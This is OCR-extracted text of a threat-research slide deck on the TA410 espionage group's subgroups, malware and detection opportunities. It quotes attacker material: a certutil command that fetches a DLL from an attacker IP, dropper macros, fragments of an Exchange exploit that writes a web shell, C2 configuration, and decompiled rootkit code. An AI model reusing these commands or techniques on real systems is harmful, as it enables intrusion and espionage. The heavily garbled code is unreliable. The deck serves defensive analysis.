TA410: APT10's
distant cousin
Alexandre Côté Cyr | Malware Researcher
Matthieu Faou | Senior Malware Researcher
bi
”. SMOKESCREEN SUPPLY CHAIN
) ATTACK TARGETS
TAIWAN FINANCIAL SECTOR
Smokescreen Supply Chain Attack Targets
Taiwan Financial Sector, A Deeper Look
Operation Cache Panda: Zero-Day in Financial Software Exploited by
China-Linked Threat Group
Valentine’s Day this year saw the end of a truly toxic relationship — a prolonged
supply chain attack targeting the Taiwan financial and securities trading sector
that had begun back in November 2021. Evidence uncovered during a CyCraft
incident response (IR) investigation ties these attacks to APT10 — a China state-
incident response (IR) investigation ties these attacks to APT10 — a China state-
sponsored hacker group widely believed to be associated with the Chinese
Intelligence Agency, the Ministry of State Security (MSS).
The November 2021 attacks disrupted online trading, causing an uproar among
the Taiwan public. At least two securities traders had to halt trading due to the
volume of unusual purchases. Targeted organizations absorbed the financial
losses and suffered the loss of customer trust. In addition, these attacks
influenced and manipulated stock prices, damaging financial transaction
credibility and honesty. If left unnoticed, these attacks could have had a
devastating impact on the financial sector.
The November attacks were originally attributed to password mismanagement
and credential stuffing; however, following a security incident response (IR)
investigation conducted by CyCraft into a second wave of attacks peaking from
the 10th to the 13th of February 2022, new evidence uncovered the exploitation
of a severe vulnerability in commonly used financial software aided by the newly
identified hacking technique, Reflective Code Loading.
Phase 2 — Lateral Movement & Lurking
The attackers used 6 individual malware to carry out this attack (only 3 landed,
and the rest were dynamically downloaded and loaded). Each was responsible
for different functions; the overall process is shown in Figure 5 below.
PresentationCache[.]exe is the QuasarRAT loader — an open-source backdoor
used by AP'T10 in past attack campaigns. First, it registered itself as a service so
that it could reside in the system and load two DLL files, PresentationFrom|[.]dll
and PresentationStatic[.]dll.
When PresentationCache[.]exe was executed, it grabbed the x86[.]bin and
DogCheck[.]bin files from the external file download server and injected these
two shellcode files into other processes. These two shellcodes dynamically
loaded the DotNET execution environment and loaded the attacker’s DotNet
Assembly for subsequent actions.
TLP:GREEN
How it started
Magnet of threats
Turla
LuckyMouse Gelsemium
https://www.welivesecurity.com/2021/06/09/gelsemium-when-threat-actors-go-gardening/
https://www.welivesecurity.com/2021/06/09/gelsemium-when-threat-actors-go-gardening/
Magnet of threats
• Expression first used by
Costin (Kaspersky Labs)
• Designate an organization
targeted by several cyber-
espionage groups from
different origins
certutil.exe
-urlcache -split –f
"http://43.254.216[.]104/
PortableDeviceApi.dll"
TLP:GREEN
A simple backdoor we named X4.
We did not find links to a known threat actor.
C:\ProgramData\Applications
\Cache\libcurl.dll
Two months later…
LookBack backdoor
https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks
https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks
https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
TL;DR
•We have
•We missed Proofpoint blogposts
discovered JollyFrogdiscovered JollyFrog“re-discovered” TA410
TA410 vs APT10
Clarifying the confusion
Notes on Attribution
Analysts identified similarities between the macros utilized in this campaign and historic APT campaigns targeting Japanese
corporations in 2018 [1]. Moreover, LookBack utilizes an encoded proxy mechanism for C&C communication that resembles a
historic TTP utilized in those campaigns. However, analysts note that the LookBack malware has not previously been associated with a
known APT actor and that no additional infrastructure or code overlaps were identified to suggest an attribution to a specific adversary.
In the attachments identified as part of the July 2019 campaigns, threat actors appeared to utilize many concatenation commands
within the macro to obfuscate the VBA function. It is possible these concatenations were an attempt to evade static signature detection
for the macro strings while maintaining the integrity of the installation mechanism, which had been historically been used to target
different sectors and geographies. The below comparison indicates the shared macro content which appears to have been rewritten.
Sub ObjRun(CommandMoveTo As String, CopyTo01 As String, CopyTo02 As String, CopyTo03 As String, Al1U:
4 ut nd As String
JeermoveComand = “cmd.exe /¢ copy twindirt\\system32\\certutil.exe ttempttcm. tmp" |
certutilComand = “cmd.exe /c Stemp$tcm.tmp -decode *
Set objws = CreateObject ("Wscript. Shell")
objws.Run CommandMoveTo, 0, True
objws.Run cermoveComand, 0, True
objws.Run certutilComand &£ AllUsersProfile é]"pensel.txt “Jé CopyTodi, 0, True
objws.Run certutilComand & AllUsersProfile é]"pense2.ctxt "J& CopyTo02, 0, True
objws.Run = ot AllUsersProfile é]"pense3.txt "Ji CopyTod3, 0, True
objws.Run["esentutl.exe 7} &é CopyTodl « "/d " & AllUsersProfile [E “cup.exe™ £ "jo", o,| True
ebjwa.Run “esentutl.exe /y " & CopyTo02 6 " /d " 6 AllUsersProfile € “libcurl.dll" € * /o", 0, True
ebjws[Kun A serarrorile GUF .€ xe",) 0, False
objws.kun “cx c de s/q & SersFrofile & "*.txt", 0, False
End Sub
Figure 3: Macro utilized in July 2018 campaigns targeting Japanese corporations
Sub Obj Run (CommandMovelo As String, CopyTo0l As String, CopyTed2 As String, CopyTo03 As String, ALLO:
cermoveComand = "“emd.exe fe copy twindirt\\systems2\\certutil.exe temp ’toan. tmp"
SertutilComand = “cmd.exe /c $tempitom.tmp -decode ™
Set objws = CreateObject ("Wacript. Shell")
Sbjvs.Fun CommanddevetTo, 0, True
objws.Run cermoveCamand, 0, True
ob jws.kRun cercutilComand £ AllUsersFrofile é]"pensel.tzc "fi CopyTodl, Oo, True
Sajws. Run certucilComand &@ AllUsersProfile ef "pensez. txt "Fe CopyTod2, 0, True
objws. Run zr ah ee AllUesersFrofile af "pense3.txt “fe Copytods, Oo, True
objwa.Run|"esentutl.exe /y [fo o& CopyToOl 6 " /d " & AlittsersProfile .2xe" 6 *
objws.Run “sentutl.exe /y |" & CopyTo02 & " /d " & AllUsersProfile £ "“Libcurl.dll™ & * /o", 0, True
0, False
objws.k cd q £ AllUsersProfile & "*.txt", 0, False
Oo”, O,) True
By Ben Hunter | October 15, 2019 TLP:GREEN
FortiGuard Labs Threat Analysis Report: This blog orginally appeared on the enSilo website and is republished here for threat research purposes. enSilo was acquired by
Fortinet in October 2019.
Summary
In April 2019, we detected what we believe to be new activity by the Chinese cyber espionage group APT10. The discovered vanants are previously unknown and deploy malware
that is unique to the threat actor. These malware families have a rich history of being used in numerous targeted attacks against government and private organizations. The activity
surfaced in Southeast Asia, a region where APT10 frequently operates.
Overview
Towards the end of April 2019, we tracked down what we believe to be new activity by APT10, a Chinese cyber espionage group. Both of the loader’s variants, as well as the various
payloads that we analyzed share similar Tactics, Techniques, and Procedures (TTPs) and code associated with APT10
Although they deliver different payloads to a victim's machine, both variants drop the following files beforehand:
Among the payloads we found were PlugX and Quasar RATs. The former is well known to be developed in-house by the group with a rich history of being used in many targeted
attacks against different government and private organizations. PlugX is a modular structured malware that has many different operational plugins, such as communication
compression and encryption, network enumeration, files interaction, remote shell operations, and more.
The samples we analyzed originated from the Philippines. APT10 frequently targets the Southeast Asia region.
In this article we examine both versions of the loader along with their payloads, TTPs, and Command and Control (C&C) server information.
TA410 ≠ APT10 / A41APT
QuasarRAT
Korplug
The Umbrella
FlowingFrog
JollyFrog LookingFrog
ffca.caibi379[.]com
Victimology
FlowingFrog
LookingFrog
JollyFrog
JollyFrog
(es)
oo
oO
€i
oo
Initial Access
Spearphishing: FlowingFrog
Royal Road / 8.t RTF builder
Tonto Team
TA410
TA413
TA428
FunnyDream / Chinoxy
SpaceOddity
Rancon
SharpPanda
GoblinPanda
00008880:
00000010:
00000020:
00000030:
00000040:
800000050:
00008860:
00000070:
00000880:
00000890:
GO00808AG:
QGOOOREBO:
AS Aa
FE
FE
DF
83
DE
8F
C2
E4
BS
63
FE
FE
je
DE
9C
92
B9
31
99
D6
6E FE
-FE
FE-FE
FE-FE
E8-FE
8E-8C
91-DE
91-C8
E8-@5
99-06
99-FB
99-02
FE
FE
FE
42
SF
8C
EQ
Al
Al
Al
Al
FE
FE
FE
F5
97
81
EQ
A3
A3
A3
A3
FE-BE
FE-FE
FE-FE
29-DD
8C-9D
88-DE
F4-D2
99-@5
99-ED
99-ED
99-05
FE
FE
FE
46
89
95
FE
Al
B4
B4
Al
FE
FE
FE
FD
DE
88
FE
A3
A7
A5
AC
FE-FE
FE-FE
FE-16
AA-29
93-9D
DE-B2
FE-FE
99-05
99-FB
99-@C
99-55
FE
FE
FE
DD
88
AF
FE
Al
Al
Al
Al
FE
FE
FE
A2
88
A3
FE
A3
A3
A3
A3
FE
FE
FE
96
SF
DE
FE
99
99
99
99
TLP:GREEN
“in
a
CSC
ee
OM Doms | )] F2-)] 60
6a Ai AUixe Joxeed
é [ex five fos Pu]
éAse 00 | —
973 OFiU0Fidd4i06
“Pia see
34 OOVidOd] NOGid6
tc pO@iG6#i%6Ui00
https://github.com/nao-sec/rr_decoder/
https://github.com/nao-sec/rr_decoder/
Exploit public facing app: LookingFrog and JollyFrog
CVE-2019-0604
ProxyLogon (March 2021)
ProxyShell (August 2021)
https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/
https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/
# -d '' =new ActiveXObject ("WSCRIPT. SHELL") .Run ("ping
") 5 J
HOST = sys.argv[1]
MAIL = sys.argv[2]
LOCAL NAME = ''
FILE PATH = 'C:\\inetpub\\wwwroot\\aspnet client\\lndex.aspx'
FILE DATA = "'
assert len(FILE DATA) < 255, "file data too long"
def unpack str(byte string):
return byte string.decode('UTF-§8').replace('\x00',
def unpack int(format, data):
return unpack(format, data) [0]
def get_sid(mail):
mry
Orange
This is Orange Speaking :)
201376115240 SHAH
EXP.tw-Meivta, RSE. AME
Exptw
Exp.tw
SQL Injection
Vulnerability
Exploit
Noirx ii SRA DL 2 ie i
Ame .
MAD
Eet(—)
>»
>
>
>
>
=
>
>
v
1
r * URRAITREST
2021 (4)
2020 (1)
2019 (8)
2018 (5)
2017 (2)
2016 (6)
2015 (8)
2014 (8)
2013 (13)
» +75 (1)
v +—-# @)
EXP.tw - Meigs. BEB. Be
Ba=T
Yahoo Bug Bounty Part 2 -
* login.yahoo.com Remote...
VWakan Bian Brink, Dark 1. 2S
TLP:GREEN
a Microsoft MSRC | Security Updates @ Acknowledgements {} Developer
MSRC > Customer Guidance > Security Update Guide > Vulnerabilities > CVE 202126855
@ Welcome to the new and improved Security Update Guide! We'd love your feedback. Please click here to share your thoughts or email us at_ msrc_eng_support@microsoft.com. Thank you!
Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2021-26855
On this page “
Security Vulnerability
Released: Mar 2, 2021 Last updated: Mar 16, 2021
Assigning CNA: © Microsoft
MITRE CVE-2021-26855
CVSS:3.0 9.1/8.4 ©
Metric Value
‘Base score metrics (8)
» Attack Vector
» Network
» Attack Complexity » Low
» Privileges Required » None
» User Interaction » None
3/2/2021 Important CVE-2021-26412 Yes Yes No No No No No
3/2/2021 Important CVE-2021-26854 Yes Yes No No No No No
e Microsoft Exchange Server 2013 CU 22 was released February 12, 2019 after which 31 vulnerabilities have been found and remediated.
e Microsoft Exchange Server 2013 CU 21 was released June 19, 2018 after which 38 vulnerabilities have been found and remediated.
e Microsoft Exchange Server 2013 Service Pack 1 was released February 25, 2014 after which 82 vulnerabilities have been found and remediated.
Please see Exchange Server build numbers and release dates for more information on Exchange Server Cumulative Updates release dates.
Acknowledgements
Volexity
Orange Tsai from DEVCORE research team
Microsoft Threat Intelligence Center (MSTIC)
Microsoft recognizes the efforts of those in the security community who help us protect customers through coordinated vulnerability disclosure. See Acknowledgements for more information.
Security Updates
To determine the support lifecycle for your software, see the Microsoft Support Lifecycle.
Updates CVSS
ctivexXObject ("WSCRIPT. SHELL") .Run ("ping
") 5 J
HOST = sys.argv[1]
MAIL = sys.argv[2]
LOCAL NAME = ''
FILE PATH = 'C:\\inetpub\\wwwroot\\aspnet client\\lndex.aspx'
FILE DATA = "'
{
mM
assert len(FILE DATA) < 255, "file data too long"
def unpack str(byte string):
return byte string.decode('UTF-§8').replace('\x00',
def unpack int(format, data):
return unpack(format, data) [0]
def get_sid(mail):
mry
Looking Frog:
X4 / LookBack
X4
Windows
registry
Decrypts
and injects
Network shellcode
: Reads/Writes
(in spoolsv.exe)
X4
VMProtect-ed
loader
C:\ProgramData\,
Microsoft\Crypto\Rs
A\Machinekeys\
Log\rsa.txt
Injects
Orchestrator
Reads/Writes (injected in
svchost.exe)
Executes
commands
X4 Capabilities
LookBack
•screenshot
https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/
https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/
LookBack Capabilities
System Information User Activity Active Control
Flowing Frog:
Tendyron / FlowCloud
Tendyron Downloader
FlowCloudt86.dat
Downloader
Loader Backdoor based on
Farfli/Gh0st
running in iexplorer.exe
Tendyron downloader
running in iexplorer.exe
Royal Road Document
injects
downloads
downloads
downloads
injects
server_config {
product_name: "PCArrowI"
product_version: "v5.0.2"
id: "1202_[REDACTED]"
root: ""
file_server: "47.111.22[.]65"
file_server_port: "80"
file_server_bak: ""
file_server_bak_port: ""
exchange_server: "47.111.22[.]65"
exchange_server_port: "81"
exchange_server_bak: ""
exchange_server_bak_port: ""
file_server_key: "E\367\016\031\314\2637[...]"
xchg_server_key: "8\335\325$\200\233e\363#\346[...]"
file_key: "U\267\323\353\213\261?\242c[...]"
is_audio_only: false
id_prefix: "1202"
}
Head First
Object-Oriented
Analysis @ Design
Turn your 00
designs Into
serious code
Impress frlends with
your UML prowess
aad
Bend your mind
around dozens of
OO exerciges
Load important 00
) design principles straight
into your brain
ae wy | See how polymorphism,
Avoid embarrassing ' jn encapsulation and
relationship Te gh | : Inheritance helped Jen
mistakes Fs ee & refactor her love life
O'REILLY” Bratt D. McLaughlin, Gary Pollice & David West
Architecture
Over 50 custom classes
FlowCloud Capabilities
System Information User Activity Detection Evasion
≥ 65 dB
@) > 65 dB _
“Ok FlowCloud”
Rootkit
| TLP:GREEN
Rootkit
erase _driver_name_from_list(L"kbdclass.sys", DriverObject, L"\\SystemRoot\\System32\\drivers\\kbdclass.sys");
erase_driver_name_from_list(L"mouclass.sys", DriverObject, L"\\SystemRoot\\System32\\drivers\\mouclass.sys’);
if ( getOsVersion(&major_version, &build_number, minor_version) < @ )
return @;
build _number_ = build_number;
if ( build_number == Windows_xXP )
{
if ( PsCreateSystemThread(&build_number, @, @, @, @, backdoor_tcp_driver, @) >= @ )
ZwClose(build_number);
erase _driver_name_from_list(L"tcpip.sys", DriverObject, L"\\SystemRoot\\System32\\drivers\\tcpip.sys");
}
else
{
if ( build _number >= Windows_Vista )
{
if ( PsCreateSystemThread(&build_ number, @, @, @, @, backdoor_nsi_driver, @) >= @ )
ZwClose(build_number) ;
erase _driver_name_from_list(L"nsiproxy.sys", DriverObject, L"\\SystemRoot\\System32\\drivers\\nsiproxy.sys");
if ( getKPROCESSOffsetsForVersion(&offsets) < @ )
return status;
active process links = (IoGetCurrentProcess() + offsets.ActiveProcessLinks);
iter = active process links;
if ( !active process links->Flink && !active_ process links->Blink )
return status;
while ( *(&iter->Flink + offsets.UniqueProcessId - offsets.ActiveProcessLinks) != proc_id )
t
iter = iter->Blink;
if ( iter == active process links )
return @xCQQ00001;
->Blink->Flink
->Flink->Blink
->Flink = 3
°->Blink = ;
->Flink;
->Blink;
| TLP:GREEN
RtlInitUnicodeString(&s_Driver_nsiproxy, L"\\Device\\Nsi");
if ( IoGetDeviceObjectPointer(&s_Driver_nsiproxy, FILE_ALL_ACCESS, &nsi_fileObject, &nsi_deviceObject) < @ )
return;
nsi_driverObject = nsi_fileObject->DeviceObject->DriverObject;
}
nsi_DeviceControl = nsi_driverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL];
_InterlockedExchange(&nsi_driverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL], nsi_DeviceControl replacement) ;
PsTerminateSystemThread(@) ;
CurrentStackLocation = Irp->Tail.Overlay.CurrentStackLocation;
if ( CurrentStackLocation->Parameters.DeviceIoControl.IoControlCode != @x12001B//
// used by NsiGetObjectAllParameters (e.g. netstat)
//
// Device type: FILE_DEVICE_NETWORK
// Access check: FILE_ANY_ACCESS
// Func Code: 6
// IO Method: METHOD_NEITHER
|| CurrentStackLocation->Parameters.DeviceIoControl.InputBufferLength != @x3C )
af
return nsi_DeviceControl(DeviceObject, Irp);
}
Pool = ExAllocatePool(NonPagedPool, @x34u) ;
Pool->CompletionRoutine = CurrentStackLocation->CompletionRoutine;
Pool->Context = CurrentStackLocation->Context;
->CompletionRoutine
Routine;
TLP:GREEN
aa Certificate ~*~
General Details Certification Path
ER Certificate Information
This certificate has been revoked by its certification
authority.
Issued te: Hangzhou Leishite Laser Technology Co., Ltd,
Issued by: WoSign Class 3 Code Signing CA
Valid from 2012-03-29 to 2014-04-02
Jolly Frog:
Quasar Rat / Korplug
QuasarRAT Korplug (aka PlugX)
• DLL side loading
• Abuse F-Secure’s qrtfix.exe
• Encrypted payload on disk
Detection opportunities
Malware delivery via certutil
https://lolbas-project.github.io/lolbas/
Binaries/Certutil/
https://lolbas-project.github.io/lolbas/Binaries/Certutil/
MS SharePoint & Exchange RCE
•Suspicious tree starting from w3wp.exe
•Ex:
• .aspx/.exe written on disk
• Several cmd.exe executed in a short period of time
Royal Road
•Rely on N-days exploits
•Updating MS Office is “enough” (and
theoretically easier than a server application)
LookBack custom network protocol – Snort rules
https://github.com/eset/malware-ioc/ta410
https://https/github.com/eset/malware-ioc/ta410
Conclusion
Conclusion
Umbrella composed of 3
subgroups
Initial access Complex Custom Backdoors
Targeted Espionage
www.eset.com | www.welivesecurity.com | @ESETresearch
Malware Researcher
Matthieu Faou
Senior Malware Researcher
alexandre.cote@eset.com
@barberousse_bin
matthieu.faou@eset.com
Alexandre Côté Cyr
TA410: APT10's distant cousin
Diapositive numéro 2
Diapositive numéro 3
Diapositive numéro 4
How it started
Diapositive numéro 6
Diapositive numéro 7
Diapositive numéro 8
Diapositive numéro 9
Diapositive numéro 10
Diapositive numéro 11
Diapositive numéro 12
Two months later…
Diapositive numéro 14
Diapositive numéro 15
TL;DR
TA410 vs APT10�Clarifying the confusion
Diapositive numéro 18
Diapositive numéro 19
Diapositive numéro 20
Diapositive numéro 21
The Umbrella
Diapositive numéro 23
Victimology
Diapositive numéro 25
Diapositive numéro 26
Diapositive numéro 27
Diapositive numéro 28
Initial Access
Spearphishing: FlowingFrog
Diapositive numéro 31
Diapositive numéro 32
Diapositive numéro 33
Exploit public facing app: LookingFrog and JollyFrog
Diapositive numéro 35
Diapositive numéro 36
Diapositive numéro 37
Diapositive numéro 38
Diapositive numéro 39
Diapositive numéro 40
Looking Frog:�X4 / LookBack
X4
X4 Capabilities
LookBack
LookBack Capabilities
Flowing Frog:�Tendyron / FlowCloud
Tendyron Downloader
Diapositive numéro 48
Diapositive numéro 49
Architecture
FlowCloud Capabilities
Diapositive numéro 52
Rootkit
Diapositive numéro 54
Diapositive numéro 55
Diapositive numéro 56
Jolly Frog:�Quasar Rat / Korplug
Diapositive numéro 58
Detection opportunities
Malware delivery via certutil
MS SharePoint & Exchange RCE
Royal Road
LookBack custom network protocol – Snort rules
Diapositive numéro 64
Diapositive numéro 65
Diapositive numéro 66